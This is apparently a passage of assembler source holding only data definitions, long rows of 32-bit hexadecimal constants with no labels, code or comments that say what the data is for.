dd 9989C4F0h, 92F73F0Bh, 875C770Dh, 6E345C67h, 1FD39FF7h
dd 0E7506E69h, 905410F5h, 0EB9F201Ah, 0E669A06Bh, 0B01D24FEh
dd 9365878Ch, 4995EC21h, 0EDE0BE00h, 843B288Bh, 3119C8E1h
dd 0AD07B6A2h, 0AC86174h, 50C87508h, 0A6B5BC0Fh, 797EBDB6h
dd 0E6FB3AEAh, 0A2C8DB16h, 83F47489h, 0D2563C1h, 6F0978F1h
dd 7C40B2A4h, 27080951h, 8AD1A26h, 6692008Ah, 4E928DE1h
dd 0DEBCC376h, 0C39FED77h, 7DD8417Bh, 0D83EA354h, 0F4068E13h
dd 8974F402h, 9DC8403Dh, 19FA8928h, 1AE93202h, 19A7A0D2h
dd 106CB064h, 3BED194Ah, 3F6E6BD6h, 22412A15h, 0F620FB6Dh
dd 38BF4157h, 9D7594D1h, 18152612h, 2F622C29h, 71579152h
dd 8E5E8C10h, 0D6D8C64Dh, 85211E3Bh, 6C60C505h, 0D8C77827h
dd 0DCA91736h, 4D6C3895h, 5B0D30D7h, 530E859h, 9FE20ED0h
dd 497ED1CEh, 0D3ECEA97h, 0CCAF0DE7h, 0CEE621D1h, 0FA9A4E49h
dd 7D512B13h, 24B5F1ECh, 29BAD6EEh, 0A5CC580Ch, 0E8FB310Ah
dd 0F143E348h, 266D743Eh, 0C550CB66h, 4246369Dh, 0F6740F9Eh
dd 24512FA5h, 67E38ABAh, 0B7B44F34h, 326A9C05h, 993CC7F6h
dd 0A442896Fh, 0C5AA7393h, 0D1C4B943h, 20F374C2h, 0F9486596h
dd 154B17F3h, 97BE7749h, 21099805h, 671AA029h, 9430504h
dd 51B66B5Ah, 7E69CF36h, 0E2EE53A0h, 0E0787B59h, 199FC30Fh
dd 29A51BCAh, 1408774Bh, 8F5A1548h, 0B8B694BAh, 593665CDh
dd 0B3AB95EDh, 0E86740D2h, 4BFDBFCEh, 5131DF1h, 11E93805h
dd 2A564DC4h, 0D1BC9AE3h, 0EFDB3B8Bh, 0A6916B50h, 5C989EB9h
dd 0C65C642Fh, 648A56C1h, 0B5801766h, 84008579h, 802D0D51h
dd 82E2C302h, 0C146F87h, 8F12F3Fh, 73394FB0h, 1CBECCAEh
dd 710D4B1Fh, 33A8FAF5h, 0A4EB8A83h, 3CD941E0h, 9FD47C97h
dd 729A29AFh, 980856F7h, 472E30D7h, 0BF891790h, 0C504CB6Bh
dd 0C8A7FC6Fh, 69895975h, 0B2B636EFh, 2E65A534h, 7FE52554h
dd 6286C9F5h, 6EEFBC23h, 76DC9399h, 7D15965Bh, 98613A38h
dd 259CD175h, 0D21C8B03h, 9CE009DFh, 0D7889B54h, 27F576D2h
dd 82BF5C0Eh, 66D8E1E7h, 0FB1572AAh, 3476B8CDh, 5DBE8C7Fh
dd 87B470B7h, 3360E4FBh, 6C776F5Dh, 0DDB68B0Bh, 9F5270D3h
dd 261F5677h, 0A98EC9E9h, 0DAA400DAh, 336E7523h, 0F75B44AEh
dd 5A13ED18h, 21D0256Bh, 0D79BF394h, 3662E378h, 2F8206EEh
dd 2CDD9308h, 0F51D43CBh, 69AA1DF2h, 19CF0AF3h, 4F7633E9h
dd 490A2E10h, 66BFFDA8h, 7DD4276Bh, 6059FF5Ah, 0A2EAFCCBh
dd 0AF1EE474h, 0A37EEE89h, 0F6ADDB7Eh, 33E2885Eh, 0EAC8C31Ch
dd 0A6FEE483h, 2B69EA63h, 6506A234h, 2849DC89h, 1700FDE2h
dd 987CE5CDh, 1CE7BB99h, 5B0EC763h, 0ED48A187h, 0E9367948h
dd 2F98FF4Bh, 16EF0D25h, 0CE5CB599h, 669801A7h, 0E31F468Bh
dd 0F0112F1Eh, 0D471AD97h, 9E00EC55h, 0ED052F92h, 14AB60F7h
dd 0D0E07456h, 9FDD9929h, 2793996Ah, 84771A9Ah, 5C62A86Dh
dd 5A71377Ch, 5EFC39FCh, 6D7F2A81h, 590893B2h, 7D46E2DFh
dd 334F2FE1h, 62683248h, 0EF32459Eh, 0B2AA3414h, 0DA38E6B9h
dd 5C02BEAAh, 0F560EF23h
dd 15B2DDA4h, 87635C0Ah, 183C44CBh, 186E9540h, 0AA52E45Ch
dd 7AD810CBh, 9EB10675h, 0C350B232h, 189F4CFFh, 3B90533Fh
dd 6992A472h, 7E4DF9E7h, 9CE98342h, 28E8531Bh, 7ECBA1A2h
dd 15B2F59Ch, 0A268A818h, 0E9ABDA1Eh, 0F41323BDh, 9E4388Ch
dd 53FA58Ch, 43AED235h, 0C9E0C3BFh, 600FD52Fh, 484578EEh
dd 76DE8D5Eh, 7310B505h, 0AECE72Fh, 8679A9E0h, 0FDAE4C62h
dd 20C15231h, 0EB192CD1h, 856FDA17h, 5CD87D95h, 0F529703Dh
dd 419DC2CFh, 2F1B6916h, 25D8EF33h, 61A77B70h, 8B1600C4h
dd 4AA19FD5h, 44C7AEF0h, 1F20658Ch, 0E510EB6Ah, 85FC3FFCh
dd 0D457C37Ah, 29120DC3h, 0E13D7534h, 0F338A3A2h, 1767C1CAh
dd 4F0EB474h, 0D6A9AA8Dh, 576C2884h, 7B8F7897h, 0CC9538C4h
dd 6C293AD8h, 0CDE57CCEh, 9A0954CFh, 18754B3Eh, 0D118AE81h
dd 25A31BE9h, 9B65F883h, 0F7EF2E4h, 0B5DFB640h, 26C98512h
dd 0C09F72B3h, 34B5594Ch, 117F6697h, 110DE69Dh, 0DB2097A2h
dd 73E40CE5h, 52528C70h, 24D2292Ah, 694D68BDh, 0FEADF252h
dd 90EA6339h, 1FDCC2ABh, 0E1D1FE9Fh, 0A344DFD3h, 0AEBB5F24h
dd 5F4B3D6Fh, 42F934F4h, 9104C0EEh, 7920F8E8h, 145D09CFh
dd 2DBD4C6Fh, 0EF584E6Dh, 0D5C66064h, 7E314EB1h, 315B430Bh
dd 91C9EDE9h, 5B0266BCh, 1089A601h, 1F87A4E6h, 0FA89DA1h
dd 0A6A8F12Bh, 39D764B6h, 0A736EC5Ch, 27DCB038h, 22909DD6h
dd 0ED8A4460h, 28E426D2h, 0D582FDE8h, 0B1B0199Eh, 5EAF958Ch
dd 6861826Bh, 0A2BAD418h, 0BCC58312h, 681CE026h, 8631F4DCh
dd 17FD55B0h, 3C4E8947h, 0A8EBF8B1h, 0E322B907h, 0D845B27Ah
dd 2AA8445Fh, 631C4A94h, 3266B745h, 337C4F4Ah, 0CDFD4A89h
dd 7C390B33h, 0FA25963Fh, 0F69F468Ch, 80A36536h, 0CA817F95h
dd 61E9002Bh, 0A0C933EDh, 0AE3FEF58h, 98C61ED9h, 629A6D35h
dd 82217D0Dh, 60112E37h, 0A10099Dh, 79DABA2Eh, 0C35084F9h
dd 7032D577h, 1C0DC506h, 0B169B80Ch, 0D5615CACh, 0E77FCA5Ch
dd 8C473B4Bh, 1694B064h, 48319CD9h, 42241AB7h, 0F22614FBh
dd 0B84E616Ah, 0D6481561h, 0B395CA01h, 0D7105BB3h, 0FB3382EFh
dd 0AF799099h, 0E1469540h, 0F2E34751h, 9CB274B6h, 58DAC5BAh
dd 0D83D3262h, 348D9356h, 4227732Ch, 9DAD6836h, 84E8F03Fh
dd 164D845Ch, 0FC84567Bh, 38C4CBCh, 7A77B0D9h, 755BE413h
dd 0B8DCA5E8h, 1D5E7AC9h, 7E220623h, 1818FB83h, 309383EEh
dd 0D0EE50E7h, 7264EFC6h, 0E5FC44E3h, 0FC79D2C4h, 9D38DAC4h
dd 0FEF1FA4Ch, 1460D6D8h, 7E3481DFh, 284CEB1Bh, 30F83BF2h
dd 0CEDC2E42h, 793298B2h, 8D4F7E1Ah, 339D62D7h, 0EBDBC02Eh
dd 0B90294F7h, 0A2522719h, 0B60B9FD0h, 0E79D5DB5h, 1D0DDD0Bh
dd 0AB6928A8h, 5004B9F3h, 252EA97Bh, 18FB461h, 6B48F0CCh
dd 0BDCD4389h, 0CBC192CFh, 0A8F99440h, 0B47AA83Ah, 2754767Bh
dd 0D0A10862h, 31ADD988h, 4EBC7EC5h, 0F9779C49h, 4C1D769h
dd 0FA376D6Eh, 2C4750C6h, 65E8EC5Fh, 2FC286EBh, 0D8DAD7h
dd 0BC34C4B3h, 33E31418h, 0BC55838Bh, 0E9BC08BAh, 3067CAC3h
dd 7038C19Dh, 4479E413h, 155F25DAh, 52404534h, 54BAD0DCh
dd 59691E2h, 0A41FC996h, 2B89B3D8h, 1186455Ah, 1456A615h
dd 0A0485063h, 0B9EC1963h, 0CBEBF09Ah, 61670216h, 0CC371639h
dd 69DF669Fh, 5F2852A2h, 0B1641E82h, 4CF7A3F8h, 0ADDD92DEh
dd 21E14086h, 0DEF0E4EAh, 0CEA85B25h, 0C56EA0ABh, 0DDCBF71Eh
dd 0DACE3091h, 933D3FD7h, 4D120628h, 0CD02583Bh, 2CAA0A82h
dd 4F28A1ABh, 0A792962Eh, 1C4DDE2Eh, 22F6501Dh, 8BE0B930h
dd 0DF2C900Ah, 0F404CBE2h, 89BB0542h, 7D2D83A8h, 2ED67707h
dd 0D2D4AF03h, 0A0672FF9h, 0D11D7BA3h, 42F23551h, 0AEEAA941h
dd 460E8558h, 1A34FA71h, 0E4340B0Dh, 90A12599h, 36916814h
dd 8E2E1B6Ch, 864EE0ADh, 7B6ACF9Ch, 0A95897B7h, 63E563B4h
dd 0F1E68FEBh, 0F23F2463h, 0DF4D5E58h, 329F29Fh, 86343D66h
dd 96CEE7E2h, 0CD7DA336h, 0F2E510AFh, 9193E8AEh, 7CC1E562h
dd 0CD1A6306h, 56BEE14Ch, 4F609EE0h, 594C34DDh, 0DF38AF36h
dd 0F90CD28Eh, 67061C1h, 5DCD909Eh, 901A9DA2h, 26365413h
dd 45C69B14h, 997533B5h, 0DBB93C1Dh, 0ED276E38h, 19447DA5h
dd 4246AAD4h, 20528492h, 6176A1E8h, 32188924h, 0CBBC4527h
dd 8C3A599Ch, 5829BF71h, 0D0D6CEh, 0C2027BC8h, 568B4061h
dd 71C53B91h, 0B6BB2C5Ah, 0BFF0FBBh, 88E1F18Ch, 58D37D7Ah
dd 0D22E82FEh, 95DB2DEFh, 0E7CE1D6Dh, 0F9129D38h, 1F329171h
dd 33DCABDh, 5621C49Dh, 855BABF4h, 49F646DDh, 37CA699Bh
dd 0C1FE1FA1h, 31534F28h, 0F638D65Bh, 0D52FE5CAh, 751EACC8h
dd 85836BF5h, 50C601D6h, 0F64B7C35h, 9248D3A5h, 0FDE36D27h
dd 0A3E8C76Ah, 9F17C33h, 39238916h, 3B80A552h, 0AD72E247h
dd 0E9CB1A70h, 0EC24F265h, 277A9EFh, 0B8410843h, 80421B2Fh
dd 225A1EBh, 48CC4420h, 25CFC9h, 0ECCDB036h, 0AE771DBEh
dd 0F5B2FD80h, 0F833A3Eh, 0E78D447Dh, 0DD80E2C2h, 4947AA02h
dd 1E6FBF83h, 3F62524Fh, 36D7C05Bh, 5A7D4AC0h, 6F8947E8h
dd 8E4032F6h, 51356EFCh, 0C8D05260h, 0A24C7697h, 3B3853CEh
dd 8FD184B6h, 43A9E076h, 2412F2F3h, 80A1B641h, 0FCB79174h
dd 0A5545CCh, 6DCA72C9h, 31723734h, 6BB315A7h, 24BAEE17h
dd 89DECB3Ch, 4197B557h, 0BA567A82h, 0F81D94FEh, 7731D031h
dd 0AB9A1997h, 2B52BD6Dh, 797E162Dh, 1E97737Fh, 2549EF47h
dd 595C7FE8h, 9C47AC39h, 8A4A1508h, 6EE76173h, 0A84EB7CBh
dd 0F03696ABh, 379AA05Ch, 0A5C8DF0Ah, 15FEA0D3h, 77DDA73h
dd 90CE6861h, 4706CAEh, 50FFD0F7h, 6431FFBFh, 4BD90C64h
dd 0ADDD8041h, 0F956412Dh, 0C407DC75h, 0BC256B37h, 2BE15342h
dd 0F5A7FBF1h, 0F32F6545h, 75A0F400h, 0DD01769Ah, 0CA9F3D09h
dd 0E4518852h, 0DDFE7056h, 8CAD5012h, 9B9EECA3h, 268D7219h
dd 0A744E787h, 0DA9EE11Eh, 0A5FDE6F4h, 0F01CAB05h, 28EFD0F5h
dd 4CF45206h, 6C9FBA41h, 0D64080CCh, 85C51369h, 0F20D36E4h
dd 0B18F1E0Fh, 8D3F3AFCh, 0C70644ABh, 4BC81111h, 0F3B0B173h
dd 20CCD848h, 0F8476589h, 0ADB9B87Ah, 0BA422843h, 7BC7D639h
dd 0C2449759h, 0C8F1E75Eh, 0F3FEEFC8h, 0E1A49CCh, 0FFCEFB43h
dd 141BB366h, 602595ACh, 15006F3Dh, 0CB32FBh, 0CE4E22B4h
dd 0B35B1D8Dh, 0C73C25F6h, 79341D3Fh, 497CE2CBh, 0CB6D0BFh
dd 0B77FE5E9h, 3EF1006Dh, 0CC69B44Eh, 8C6206ACh, 31F1CD18h
dd 1F71C5D0h, 4DBFBA67h, 8F49E446h, 0EF27A953h, 2CB6A055h
dd 0F00BFD81h, 8A5AA66Bh, 0E530037Ch, 0B990DFFBh, 27273C2h
dd 294A166Fh, 62696DC4h, 38510F75h, 0FEC6CE0Bh, 97F590ADh
dd 0F98FD404h, 0C674241Dh, 0E32F25F4h, 0D84BAA0Eh, 0DCCC52CAh
dd 7238B42Eh, 3D953486h, 5B02BC28h, 83670C6Dh, 21F7F6D0h
dd 0BFE5FBC1h, 224AE9D9h, 0A04D8BAh, 0A8078D93h, 0DC91D72Dh
dd 738F4FF6h, 3D5B4ABFh, 23B880CBh, 83260411h, 0CEF4BF90h
dd 0D5A2247Eh, 0C348E7D1h, 82FF45FAh, 0A6C45E61h, 45F8CB91h
dd 1E8010h, 0F57F2431h, 2C943C50h, 37F6424Ch, 6BD6523Dh
dd 0BCB0AA03h, 0F134C60Dh, 8147E410h, 7B1A34DAh, 0B128784h
dd 54D514BBh, 571F279Ch, 1EDFB73h, 7384F11Fh, 0E12A503Ch
dd 0E4E4E6D0h, 0B850CCF1h, 1BBDD181h, 87DAD82Eh, 0E1991EAAh
dd 0E03B443Ah, 4EA3AF4Eh
dd 2635674h, 0B1A6C5C2h, 9BFC43C8h, 0FD983B48h, 0BFFB9B22h
dd 9BC2097h, 709D24DCh, 84A732Dh, 0CFAD6751h, 0AF2BBE79h
dd 5D57D547h, 4D4F7325h, 454B5816h, 399B39BBh, 87787B1Fh
dd 7175B1A8h, 1227D318h, 5F249ADBh, 5EB1B4AAh, 203387F2h
dd 4E8F6F98h, 0F897BFA2h, 0B0779481h, 0A6BDAF5Fh, 2961571Ch
dd 9B5ECE09h, 0A36B38B7h, 4ABA0890h, 0C614F9BCh, 13D1D73Eh
dd 0BC437CF3h, 34770F1Bh, 0D087AD34h, 1CB54168h, 0D784D3B4h
dd 0AFA4C4B0h, 7020F5F2h, 1DE3BF8Dh, 9BDC7AE2h, 5B3AA094h
dd 0EB6D8FDDh, 79100B39h, 502BBE7Eh, 0C331BF23h, 0B055AF89h
dd 3A86F9CCh, 0A477D652h, 1579876Dh, 649123C8h, 0AAE1C2B1h
dd 0DA0CC283h, 2A47E540h, 33560B7Dh, 83AA5890h, 1DCE6112h
dd 0FC1570F7h, 4D1A4944h, 8DDBA9EDh, 0B26221EBh, 0C6E69755h
dd 4CA98CEBh, 0BB6CBABDh, 7E4CCFFDh, 9DDD2478h, 2A239024h
dd 2C6EC037h, 0A7C7DF9Ah, 1B82E03Fh, 7ECF70A2h, 0D44CCE62h
dd 0C7FB6A7Eh, 0DFB1F996h, 346207C6h, 9393F3FBh, 9B714B56h
dd 7E683173h, 0CEE2D746h, 829556C8h, 0FDE4F06Dh, 0A76F7399h
dd 0DB5E3572h, 0E0CDD94Dh, 0A4BCB1Fh, 9BDB1140h, 3AEE222Eh
dd 6A02B51Eh, 0DEEB8345h, 5B3DAA30h, 0D573E6D0h, 61B1915Ch
dd 8FAA1647h, 3ED1C95Bh, 0A7096C9Bh, 28104485h, 0E30F12EAh
dd 0EED0B706h, 0FC1A0587h, 408468DBh, 0AA2405C2h, 0E6C9E9D0h
dd 3F0B3EF5h, 2D845C9Ch, 3784B5Dh, 47DBC46Eh, 32A15BB3h
dd 6DCB04CDh, 0A4E76A5h, 0EC04C4FDh, 0FB57586Dh, 0BD91677Ch
dd 2B049508h, 0ED78729h, 531A78F5h, 0D9C89BFAh, 61B4ACA7h
dd 0B5E1488Ch, 0C2C96853h, 0D2448C33h, 2CF439D0h, 1D435B22h
dd 9CE5D2B9h, 0F14AFA77h, 924E4966h, 0AF4F6983h, 603E72ABh
dd 0FE783E89h, 0FDA5997Ch, 2171268Ch, 0EEBBFBD7h, 3EB13F2Eh
dd 0A0A7E4D8h, 55921C98h, 0D4979C6Bh, 3922511Ch, 0D04219E7h
dd 0C6865658h, 6829B0EDh, 0CABF15BCh, 0B676B287h, 1B414EB8h
dd 0D4F5628h, 8D5A9B49h, 9CAA9441h, 0BE393C32h, 198B765Ch
dd 0ECBAD388h, 7365ED88h, 564B1672h, 1CC34Ch, 87C4C591h
dd 0D8C22561h, 97F05DB5h, 0FF6C1E19h, 0FC98A8E1h, 5CD0F8EFh
dd 2F0E640Eh, 0CC99F81Ch, 0CE6BFFD3h, 0DAD1977Dh, 7F47C06Bh
dd 406E64C9h, 1956FC06h, 0BD39360Eh, 46FEC3D9h, 0F3270317h
dd 122BB482h, 57D613C2h, 0F72687EBh, 51B7EEEh, 59E54AA9h
dd 953DF4A2h, 0C97C57FBh, 26CC15D2h, 4BA7E3FBh, 9EFEE123h
dd 0A27589DBh, 0B77B89F0h, 4EEC4BBAh, 3C551126h, 3F31449Dh
dd 0A97F0D64h, 0CE3E6469h, 1FBDE72Ah, 0DAD965B1h, 0F3AED83Eh
dd 0FACCB783h, 0E85B9903h, 9382689Fh, 0BC7C36F6h, 2CB7F52Ah
dd 5C94838Dh, 1F34DFBh, 28F7538Fh, 0F0BC36E7h, 0E1075113h
dd 0A51DFDC8h, 0A7ED2917h, 7D7CDC20h, 1255F9CDh, 0D86A8647h
dd 0B4C4D5D1h, 0C1AEA615h, 9FCA2413h, 0C1C27DA5h, 198674C9h
dd 0B957440Fh, 96B9C88Bh, 0D0855F1Bh, 5C901CDDh, 0A2198Bh
dd 0D6F5DC7Bh, 0DAF7EDA6h, 2E61970Bh, 924FF88Bh, 8B7AC33Eh
dd 6BD8FD9Dh, 5776B6C7h, 0B7D7DE0Ch, 0C70D257Ch, 15637024h
dd 6554A52Eh, 5CBC0758h, 2283CFC7h, 751731C7h, 6D0541C9h
dd 0BE1A787h, 5D46F9BAh, 0C57B6F4Fh, 8C34AEA2h, 0F3DDBB35h
dd 0AF9B94D1h, 0E5209101h, 0B965331Ah, 2EBD6094h, 1E8DAEA0h
dd 0B2C90341h, 0F055DFA9h, 47BC7079h, 0CD6A775Eh, 567CCF7Fh
dd 0DD425EEFh, 0DCDAAB24h, 29E29829h, 6F5BA4EAh, 741D94A0h
dd 1760EB06h, 31B471Fh, 738BDFE9h, 0EBE8BA85h, 0E70BFDD7h
dd 0F8300322h, 27FFB597h, 1C991E58h, 0BF31ECC3h, 0FCE3B1A9h
dd 0CE6617FDh, 0EB2E8CD4h, 7187F1A6h, 0D9CF6D76h, 0A9473E90h
dd 46835581h, 636A1F50h, 0AAA9D4B1h, 539E3939h, 0B3557CD1h
dd 0B7C09671h, 0D336FD20h, 344BEDCEh, 511D8F68h, 1635B15Bh
dd 19FF2BB1h, 0ECB3FFA6h, 71A7EABFh, 9B846C2Bh, 0A83E2135h
dd 2C6239E2h, 3E44513Bh, 0A85CAF0Fh, 0EF3BFB10h, 65D164F2h
dd 0A67D4EC3h, 142B915Ah, 0EDE83FEh, 0EE1DE62Eh, 0A1F5E970h
dd 0CE2074FAh, 0A8C690D6h, 20149DF5h, 4272830Eh, 717F4AB4h
dd 0EF2F170Dh, 0A0720F44h, 0CB73324Ch, 7008A3B2h, 0FACF0A23h
dd 7EAA223Ch, 886B1FB1h, 0CED99509h, 0D7719F9Dh, 7F261BB4h
dd 0C0BC7953h, 96852F9Bh, 20668ACEh, 751CF4E1h, 2F7A1111h
dd 0E417357h, 0F44CFAC4h, 0E876F87Ch, 2FB688A6h, 6AF4F5C0h
dd 16F4EC68h, 0EB6B4DDCh, 0D7727B72h, 4851E5DAh, 0E8B90808h
dd 6652FB5Eh, 44600833h, 61EF73ECh, 4036C84Bh, 0B443079Eh
dd 0FCE1A4A8h, 0AAD616FDh, 847E12B5h, 3734B084h, 0CFF9C8A3h
dd 0C0F0FB13h, 3BF63D4Ch, 0FE3FE0E1h, 3D5C6BFAh, 262328AFh
dd 0DAF44483h, 54D82E45h, 87CBE19Fh, 0B7EF7B50h, 146B1538h
dd 1EAB7EF4h, 0DB0A100Bh, 7F4E53F0h, 58F5B6E9h, 0EDB09719h
dd 359A56EDh, 0F52BADB1h, 0BEF2870h, 79A910Dh, 0EC281CDDh
dd 0C945E58Bh, 5A39ABE2h, 81AB1097h, 0C5F5A905h, 12C98261h
dd 0E7BE7016h, 0E23CBCFDh, 8D8AB0C6h, 41AAAF86h, 0D5A9C4B3h
dd 0AAA5D087h, 156D0DD0h, 1A2144B4h, 646A7FEh, 41DE548Eh
dd 0D4723466h, 260CF75Bh, 42D8B9B9h, 0DCBBB48Ch, 6201650Bh
dd 0D6E1B5AFh, 34040FEh, 0A87A1ED0h, 0C526F79Fh, 667BBA2Fh
dd 0A1100E90h, 53B13492h, 9DF963E2h, 0EA2C87E2h, 0D8D993CBh
dd 579EB3DFh, 7107E273h, 20D4BB82h, 67FF72D3h, 7B470B4Fh
dd 68323689h, 781AB392h, 3A005CDAh, 5E72E3A6h, 0E890AD54h
dd 7351D44h, 0C386E65Bh, 0DF765EB7h, 0F604489h, 0ADA8C28Bh
dd 6CE8ABA0h, 0CE2F1E11h, 0F762CCFCh, 0FD497717h, 55541C8Dh
dd 0D231748Ch, 3C748E9Bh, 36182796h, 0E7EBA582h, 6F62DB89h
dd 0BC242EEBh, 0D434F777h, 0D6D194D9h, 47DAAAABh, 34E0A9FBh
dd 4A0E01C3h, 870E45BCh, 841BA23Ch, 0F583E1D6h, 330D5F0Ah
dd 70EC8208h, 0CBAC12BFh, 3DF7BC44h, 59ECC9F5h, 0FB54DBD8h
dd 0B9181752h, 9647301Bh, 0CA2146AFh, 47723EE2h, 0F99EC273h
dd 2B212528h, 0A98D1AD2h, 3AE8B847h, 0E73393EEh, 40E4AAD1h
dd 4E197EFAh, 0E329C669h, 0E376306Dh, 0D5650F39h, 0ACEFE602h
dd 2B22A262h, 163AF53Eh, 0F69021C0h, 4A82F44Bh, 624C60E8h
dd 0D9F23E07h, 0F3649793h, 4E593D7Fh, 3EA1908h, 0B93CBAE7h
dd 592EE2A4h, 0B0E8A0ABh, 3055409Eh, 4522F15Bh, 9D245AA1h
dd 1714BDBFh, 93FA31E7h, 99DF5CC3h, 58D31BC1h, 5E1ECFBCh
dd 6E123018h, 9E699D9Fh, 4B129C2h, 6ADA3EDCh, 0EDB5C8FFh
dd 0D7FFB843h, 97854C84h, 46A52916h, 916A69D0h, 8A19BA12h
dd 2BDCEC1Fh, 55DB9CA2h, 0D0BB60C6h, 9496F9B3h, 8BC31703h
dd 6CD407BBh, 0B5157166h, 40848516h, 8AA146ABh, 0DEC1C61Ch
dd 9C858395h, 90B68512h, 0CF9D9647h, 0E32ED3C2h, 80A4BC7Ch
dd 7D6FCE42h, 0E47EB74Bh, 0FC096BE7h, 1025B80Eh, 8FD6242Eh
dd 6AFE6952h, 322922F3h, 21068B9Eh, 987C8398h, 1D93BC01h
dd 0AC6533E4h, 27C63CAEh, 0FDF57FAh, 1A96029Ah, 84E01CA9h
dd 95F6E395h, 326B9926h, 5E941F7Ch, 478CB989h, 1F113F48h
dd 45795D82h, 5A94367Ch, 16B1DBEBh, 5B1CC35Ah, 1D474745h
dd 0F9658A19h, 93D04B4h, 0AE3DF78h, 0A7E7B610h, 996CBEC8h
dd 0B7F01192h, 0A9F4B6F1h, 0A21BB65Ah, 0E65AB624h, 0D78A4D1Eh
dd 239D8FB5h, 59DC3CE0h
dd 0EDF7F837h, 0D4B7C7Eh, 298EE54Ch, 0FA691326h, 0E3FAA5FBh
dd 426A7CFDh, 0EF1C7809h, 0EC1CCCFCh, 3B6388B1h, 12F9CF3Eh
dd 0E9E36D07h, 0CA792E82h, 0A3110631h, 5EFEE34Ch, 241B10E6h
dd 4F7D05CBh, 8C6895Ah, 0E250F93h, 6D55C0h, 90B8DFF1h
dd 0E1B6675Dh, 0E10925A4h, 0EB77E66Dh, 37A84C95h, 5559C64h
dd 0D9B09CE9h, 0F6264879h, 0C98F7B20h, 0A78604AFh, 4EA6478Bh
dd 0C453647Fh, 5FF5972Ch, 21F9A157h, 69596EC0h, 0F8D63EDh
dd 434E6F4Dh, 762CD5A0h, 0F017475h, 0A3846624h, 9BFB049Ah
dd 4A046C71h, 3E2463A7h, 299B2B23h, 1221E9C1h, 363D9BF2h
dd 0AD2333DCh, 30B76BAh, 7745EEF4h, 5FFBBA15h, 0FA417095h
dd 7BF3C6BCh, 0FAE05A6Dh, 942104B4h, 3E198CDFh, 0F5E37CCBh
dd 0C0E5CF5Ch, 66CFB8Fh, 6B216FFDh, 7CA5C4E5h, 540BE768h
dd 79BCE472h, 51BA9550h, 60BAB852h, 540F04F1h, 0B6B6F7B8h
dd 0DEB251CCh, 0ED124690h, 34E6477Ah, 7FD63A86h, 0FC82266Dh
dd 0FCBDC77Ah, 76CF7E35h, 9CE26864h, 80531131h, 12E7B9A7h
dd 0DF197CD5h, 1BE2AD7Eh, 0DD81FDA2h, 394AC8D9h, 1016669Eh
dd 288AEF59h, 9882AF63h, 829986CAh, 754CD41h, 495C2EECh
dd 767B8CE5h, 220CBED1h, 2BA8E5C0h, 0EFA8BD20h, 32907277h
dd 9C0FB781h, 0A9855944h, 573D8DB2h, 4F71A8AAh, 8815A289h
dd 0B53A874Ch, 0A8B71352h, 581A106Bh, 0ED45D15Eh, 0AFD57658h
dd 58FCB3BEh, 0A6A06D96h, 0B1CD3B8Ah, 934B1500h, 24FF62A1h
dd 0C873B354h, 0CB737EBAh, 4C58AE82h, 0FAF0F503h, 0D3999C1Ch
dd 3EDB9CADh, 0CC1D93C0h, 638FBDBh, 0DB4A46FFh, 0CAB6D815h
dd 627E933Ch, 5ACB71CDh, 0FE5E34BFh, 9CB8FCF6h, 89295C85h
dd 3989EF48h, 0E221A763h, 1BA54D4Dh, 6B6A4643h, 3526693Dh
dd 0A2BAF325h, 15A7DDFCh, 1040745h, 0C1C26927h, 0AD1BF6F9h
dd 6900EF20h, 9EF5B123h, 8D664F17h, 35C8B21Ch, 2E12AA1Dh
dd 0D483E779h, 869587E8h, 0EB716680h, 0EAA1DD89h, 0AA2F7FB6h
dd 0F0D8025Bh, 55C00D34h, 0E0C994Fh, 873C2E8Fh, 1F3DB154h
dd 1206C8AEh, 0C962CA2Ch, 3E6980F2h, 0B6A959C4h, 44B48089h
dd 0E3A31FA5h, 7F05A9A1h, 0C83891EEh, 665FFB65h, 0B22FFC21h
dd 883C5182h, 6A63985Dh, 59BBC72Bh, 0C0B67D54h, 9483D40Fh
dd 0A8AE5DEEh, 0C4F7E0B5h, 0D4ACBB9Bh, 8EA671B9h, 0C0FB8775h
dd 0D8C36B51h, 9B5441D2h, 0BB7BD11Ah, 0FCE3441Fh, 0A3DFE7C0h
dd 94165FA1h, 1F11B20Ah, 0A9701D2Fh, 12E7E31Ah, 858B34BEh
dd 4D8E396Dh, 0D6F0F8E2h, 38B1D380h, 0FC5D001Ch, 91EC8E1Fh
dd 0DC3FE4FFh, 0CAF514F5h, 0DED27855h, 6EAC9052h, 17559A0h
dd 411FE347h, 60429D3Fh, 188E863Ch, 8A0A9D4Bh, 126753F0h
dd 96E7FC9Ah, 0B306DDE6h, 0AEF6D644h, 0E4DC73E8h, 788455B9h
dd 96EC9E47h, 81712806h, 9542F03Eh, 0B9963BA3h, 4BED8DAFh
dd 3A2E0D05h, 7E3F5C59h, 62EDD035h, 6AAD36B8h, 77CDCB47h
dd 0CDB5DE72h, 9B4B13ADh, 0C7D3ACE6h, 7C6B019Dh, 0A0449D91h
dd 0D0B71F45h, 0D9BE8D2Eh, 8478A544h, 0A7CA5A72h, 9985FC38h
dd 0C733E0A2h, 0EA78FD59h, 0F7277293h, 555CEA31h, 0D2193BE5h
dd 0B231DF32h, 548ED022h, 0D44971E6h, 381BE620h, 0C7D22C86h
dd 8B46394Ah, 0A4DCB854h, 0DC3262BDh, 500E3041h, 4A33BBB4h
dd 0EF460E4Ch, 0D897EE98h, 8A6B411Ah, 96C1BA81h, 2EC5FDDAh
dd 8629B827h, 8032DC10h, 49963988h, 0B12E23FCh, 0FD0A27F6h
dd 8955ED72h, 0B60DEC5Eh, 75074C7Eh, 0A3C58B77h, 108562B6h
dd 3B12C0D3h, 42C12B4Fh, 0FB31541Fh, 1E085EC2h, 0B01BE983h
dd 73CCA266h, 99DF25B7h, 211730FBh, 50256751h, 4310F02Ch
dd 949A84DEh, 3E5794FAh, 129607EAh, 0A8C94906h, 0A8EE56D2h
dd 0C05C6D47h, 5286BDB7h, 6E680D9h, 6ABF6539h, 9682859Ch
dd 62AD4446h, 0C64A2BD2h, 0D2E73260h, 0FEB9C82Eh, 0A99F3DF1h
dd 22EFF735h, 8871F18Eh, 0A4CBDB67h, 2C242CB0h, 97905A7Fh
dd 601CA52Eh, 1EF79AE5h, 0FE135222h, 0B2DEF55Fh, 0DF3E0129h
dd 0EFC786FCh, 26C21F06h, 10630E51h, 39297EA7h, 45396B42h
dd 3C0D0929h, 0E2523CF6h, 0F651018Bh, 1E5495BCh, 0ACB76F99h
dd 727D8A5h, 65FAB1CEh, 4CD12EDFh, 1604AC29h, 0C6A7C1Ch
dd 9D658674h, 82C8A4h, 17741E24h, 0F774F298h, 1B196A51h
